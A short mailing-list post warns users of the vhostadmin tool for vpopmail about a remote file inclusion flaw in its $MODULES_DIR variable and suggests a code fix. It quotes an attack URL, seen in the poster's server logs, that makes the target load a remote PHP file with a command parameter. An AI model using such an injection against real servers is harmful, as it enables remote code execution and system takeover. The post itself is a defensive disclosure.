I know this is not exactly vpopmail related, but as its a vpopmail related tool i thought others here would like to be made aware of this.
I have been using vhostadmin for a while now, and have just noticed that it is vulnerable to a xss attack which could lead to the underlying system being cracked. The problem is the $MODULES_DIR var is not being protected against injection of a remote path and simply accepts whatever is passed to it such as http://server/path/to/vhostadmin/modules/main.php?MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d A quick fix is to change global.inc and change $MODULES_DIR = 'modules'; to define("MODULES_DIR", "modules"); and then change all references in any file it appears in of $MODULES_DIR to MODULES_DIR and comment out any references to global $MODULES_DIR; to //global $MODULES_DIR; There may be other issues, but this one I came accross yesterday when I noticed the above formated url in the apacge logs. Also, we have modified some of the system ourselves, so it is entirely possible that we may be partly to blame for some or all of this, but it would certainly be worth watching out for if you are using the system. Regards Shane
